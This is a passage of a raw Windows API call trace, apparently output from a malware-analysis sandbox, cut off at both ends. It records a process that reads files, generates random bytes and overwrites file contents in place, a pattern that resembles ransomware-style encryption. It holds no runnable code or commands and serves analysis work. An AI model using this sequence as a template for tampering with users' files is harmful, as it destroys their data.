lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x85, lpOverlapped=0x0) returned 1 [0083.152] SetFilePointerEx (in: hFile=0x908, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.152] WriteFile (in: hFile=0x908, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x85, lpOverlapped=0x0) returned 1 [0083.152] GetProcessHeap () returned 0x4f10000 [0083.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.152] GetProcessHeap () returned 0x4f10000 [0083.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.152] GetProcessHeap () returned 0x4f10000 [0083.152] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.152] GetProcessHeap () returned 0x4f10000 [0083.152] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.152] GetProcessHeap () returned 0x4f10000 [0083.152] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.152] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.153] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.153] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.154] GetProcessHeap () returned 0x4f10000 [0083.154] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.155] GetProcessHeap () returned 0x4f10000 [0083.155] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.156] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.156] GetProcessHeap () returned 0x4f10000 [0083.157] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.157] GetProcessHeap () returned 0x4f10000 [0083.157] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.157] GetProcessHeap () returned 0x4f10000 [0083.157] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.157] GetProcessHeap () returned 0x4f10000 [0083.157] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.157] SetFilePointerEx (in: hFile=0x908, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.157] WriteFile (in: hFile=0x908, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.157] WriteFile (in: hFile=0x908, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.157] GetProcessHeap () returned 0x4f10000 [0083.157] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.157] GetProcessHeap () returned 0x4f10000 [0083.157] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.157] GetProcessHeap () returned 0x4f10000 [0083.157] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.157] CloseHandle (hObject=0x908) returned 1 [0083.158] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 98 [0083.158] SetFilePointerEx (in: hFile=0x90c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.158] ReadFile (in: hFile=0x90c, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.158] SetFilePointerEx (in: hFile=0x90c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.158] GetProcessHeap () returned 0x4f10000 [0083.158] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.158] GetProcessHeap () returned 0x4f10000 [0083.158] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.158] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.158] GetProcessHeap () returned 0x4f10000 [0083.158] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.158] ReadFile (in: hFile=0x90c, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x85, lpOverlapped=0x0) returned 1 [0083.161] SetFilePointerEx (in: hFile=0x90c, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.161] WriteFile (in: hFile=0x90c, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x85, lpOverlapped=0x0) returned 1 [0083.161] GetProcessHeap () returned 0x4f10000 [0083.161] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.161] GetProcessHeap () returned 0x4f10000 [0083.161] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.161] GetProcessHeap () returned 0x4f10000 [0083.161] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.161] GetProcessHeap () returned 0x4f10000 [0083.161] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.161] GetProcessHeap () returned 0x4f10000 [0083.161] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.161] GetProcessHeap () returned 0x4f10000 [0083.161] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.161] GetProcessHeap () returned 0x4f10000 [0083.161] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.161] GetProcessHeap () returned 0x4f10000 [0083.161] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.161] GetProcessHeap () returned 0x4f10000 [0083.161] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.162] GetProcessHeap () returned 0x4f10000 [0083.162] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.163] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.163] GetProcessHeap () returned 0x4f10000 [0083.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.164] GetProcessHeap () returned 0x4f10000 [0083.164] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.165] GetProcessHeap () returned 0x4f10000 [0083.165] HeapFree (in: 